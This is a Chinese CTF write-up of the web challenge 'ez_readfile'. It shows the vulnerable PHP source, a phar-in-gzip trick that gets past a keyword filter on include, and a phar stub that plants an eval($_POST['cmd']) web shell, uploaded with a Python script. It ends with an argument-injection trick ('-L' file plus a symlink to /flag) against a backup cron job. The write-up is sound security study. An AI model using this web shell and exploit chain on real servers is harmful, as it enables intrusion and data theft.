【2025“湾区杯”网络安全大赛】 web ez_readfile 详细题解wp

ez_readfile

 <?php
highlight_file(__FILE__);

function waf($data){
    if (is_array($data)){
        die("Cannot transfer arrays");
    }
    if (preg_match('/<\?|__HALT_COMPILER|get|Coral|Nimbus|Zephyr|Acheron|ctor|payload|php|filter|base64|rot13|read|data/i', $data)) {
        die("You can't do");
    }
}

class Coral{
    public $pivot;

    public function __set($k, $value) {
        $k = $this->pivot->ctor;
        echo new $k($value);
    }
}

class Nimbus{
    public $handle;
    public $ctor;

    public function __destruct() {
        return $this->handle();
    }
    public function __call($name, $arg){
        $arg[1] = $this->handle->$name;
    }
}

class Zephyr{
    public $target;
    public $payload;
    public function __get($prop)
    {
        $this->target->$prop = $this->payload;
    }
}

class Acheron {
    public $mode;

    public function __destruct(){
        $data = $_POST[0];
        if ($this->mode == 'w') {
            waf($data);
            $filename = "/tmp/".md5(rand()).".phar";
            file_put_contents($filename, $data);
            echo $filename;
        } else if ($this->mode == 'r') {
            waf($data);
            $f = include($data);
            if($f){
                echo "It is file";
            }
            else{
                echo "You can look at the others";
            }
        }
    }
}

if(strlen($_POST[1]) < 52) {
    $a = unserialize($_POST[1]);
}
else{
    echo "str too long";
}

?> 

参考文件 当include邂逅phar——DeadsecCTF2025 baby-web.pdf

当include邂逅phar题解

简单来说就是一个php文件包含的trick,当上传文件逻辑判断把能够写马的关键词全部ban了,这个时候怎么才能写马上传

代码审计后发现,我们可以上传一个文件,后缀必须是“zip,bz2,gz,xz,7z”其中之一,并且严格过滤关键字。不能出现HALT_COMPILER()、PK、<?和<?php,成功上传后会通过

$include_url=basename($_GET['url'])

获取到文件然后用

@include($SANDBOX . '/' . $include_url)

进行include

由于使用的是basename获取的文件名,所以无法用路径拼接或者伪协议来做,没有可控点,再加上关键字全部被过滤,也不可能被绕过,正常思路是无法做出来的

本题的trick需要去看php的源码跟进include上传的底层逻辑

这里用一下原文章的跟进过程

当我们include一个文件时,会调用一个叫做compile_filename的方法

它是zend引擎(php内核)的一个内部函数,他的作用...
可以看到其中有一行调用了zend_compile_file,顾名思义,它的作用是使用zend的编译器编译这个文件
跟进zend_compile_file

它判断到strstr(ZSTR_VAL(file_handle->filename),".phar"),也就是发现文件名中包含字符串.pahr就会调用phar_open_from_filename,继续跟进

这里调用了一个叫做phar_open_from_fp的东西,继续跟进

phar_open_from_fp()是用于从一个php_stream(即打开的文件流)中解析并打开一个phar文件的函数

wechat_2025-09-09_105855_321
wechat_2025-09-09_105927_022
所以我们可以先生成一个phar文件

<?php
$phar=new Phar('exploit.phar');
$phar->startBuffering();

$stub=<<<'STUB'
<?php
system('whoami');
__HALT_COMPILER();
?>
STUB;

$phar->setStub($stub);
$phar->addFromString('test.txt','test');
$phar->stopBuffering();

?>

wechat_2025-09-09_110256_095

打开可以发现还有关键字

打包成gz文件

wechat_2025-09-09_110414_931

可以看到打开gz文件后关键字消失了,此时上传可以绕过关键字检测

而当我们include这个phar.gz文件时,php会自动解压这个gz文件,所以最后相当于是直接include这个phar文件,而这里面有php代码,所以直接执行了

在跟进时我们注意到,php的判断逻辑是只要文件名里有.phar这几个字就行

所以不是必须是gz文件,其他的比如phar.png phar.html等均可以include包含后直接rce,前提是绕过文件上传的关键字检测。

举一反三 本题题解

首先代码审计,可以发现利用点就在Acheron类中。有一个属性mode,data通过post传参

当mode是w时,首先过一下waf查看是否有被过滤的关键词,把data的数据放在filename文件中,然后输出filename路径

当mode是r时,同样先过一下waf,然后给了一个参数f,include了传上去的data,上传成功输出It is file。

结合上面的知识点这个题的思路就显而易见了。首先打一个phar包,里面写马,然后压缩成gz包上传,上传成功后include包含这个gz包就会以phar包形式解析。

我们先打pop链

 <?php
highlight_file(__FILE__);
class Acheron {
    public $mode;

}
$a=new Acheron();
$a->mode='w';
echo(serialize($a));
?> 

得到上传gz文件的序列化字符串

O:7:"Acheron":1:{s:4:"mode";s:1:"w";}

做phar包

<?php
$phar = new Phar('exp.phar');
$phar -> startBuffering();
$stub = <<< 'STUB'
<?php
system('echo "<?php eval(\$_POST[\'cmd\']); ?>" > /var/www/html/shell.php');
__HALT_COMPILER();
?>
STUB;
$phar -> setStub($stub);
$phar -> addFromString('a.txt', 'aaaa');
$phar -> stopBuffering();
?>

运行后生成一个exp.phar

将它再压缩成exp.phar.gzip,以备上传

写exp

import requests
url=''
with open("exp.phar.gz","rb") as f:
    data = {"1":"O:7:\"Acheron\":1:{s:4:\"mode\";s:1:\"w\";}","0":f.read()}
    r = requests.post(url,data=data)
    print(r.text)

得到filename路径

wechat_2025-09-09_162443_506

post传

微信图片_20250908160521_63_243

这里报错是因为序列化的O写成0了 正常执行会回显It is file

然后我们访问shell.php,发现不再是404了,已经可以200OK访问了,证明我们写马成功

蚁剑连一下,密码就是写phar包脚本中的post参数cmd,编码器选base64,连接成功

这里直接读flag权限不够,这里涉及到另外一个知识点

首先在根目录找到run.sh脚本

#!/bin/bash
cd /var/www/html/
while :
do
cp -P * /var/www/html/backup/
chmod 755 -R /var/www/html/backup/
sleep 10

让AI解释一下

整体作用就是每隔10秒把/var/www/html下的内容复制一份到/var/www/html/backup/,然后把备份目录及其内容权限设为755,并无限循环执行。实质上是一个非常简单的“定时备份”脚本。

我们可以利用这个脚本,因为对flag没有权限,所以我们不能直接把他从根目录复制到/var/www/html目录下,但是我们可以创建一个指向flag的软链接

ln -s /flag flag

但是脚本中的cp执行是-P参数,不跟随链接,就是只会把软链接复制过去,而不包括软链接指向的flag的内容,这样还是看不到flag

cp指令参数

wechat_2025-09-15_085257_965

* 的解析规则(Shell Globbing)
  • Shell会列出当前目录下所有非隐藏文件和目录(以 . 开头的不会被列出)
  • 然后按字母顺序排序,生成一个文件名列表
  • 最后,把 * 替换成这个列表,再执行cp命令

如果当前目录有:

a.txt
b.txt
file.txt

就会解析成

cp -P a.txt b.txt file.txt /var/www/html/backup/
如果文件名是 - 开头会发生什么

文件名被当作命令行选项解析

linux有个特性

系统命令参数后来者胜出

也就是按命令最后面的参数执行

例如

wechat_2025-09-15_085908_234

所以我们需要把cp -P的参数改成-L

就要在目录中新建一个名为-L的文件

根据 * 的解析规则,-L会和所有文件名一起列出

又因为是按字母顺序排序,所以以 - 开头的会被列在第一位

如果当前目录有

a.txt
b.txt
file.txt
-L

此时cp -P * /var/www/html/backup/就会解析成

cp -P -L a.txt b.txt file.txt /var/www/html/backup/

这时根据系统命令参数后来者居上原则,cp的参数不再是-P,而是-L

这时cp复制就会把软链接和软链接指向的文件一起复制

解题

进入蚁剑,打开命令行终端

cd /var/www/html

进入html目录

>-L

创建名为-L的文件

ln -s /flag flag

创建一个软链接指向根目录的flag文件

此时只要run.sh文件触发,cp -P *解析为

cp -P -L xxx xxx xxx flag xxx /var/www/html/backup/

就会触发cp的L参数,把软链接和软链接指向的根目录的flag文件复制到/var/www/html/backup/,权限为755可读

cd ./backup
cat flag

拿到flag

微信图片_20250908162125_102_243

posted @ 2025-09-15 09:51  Acc1oFl4g  阅读(130)  评论(0)    收藏  举报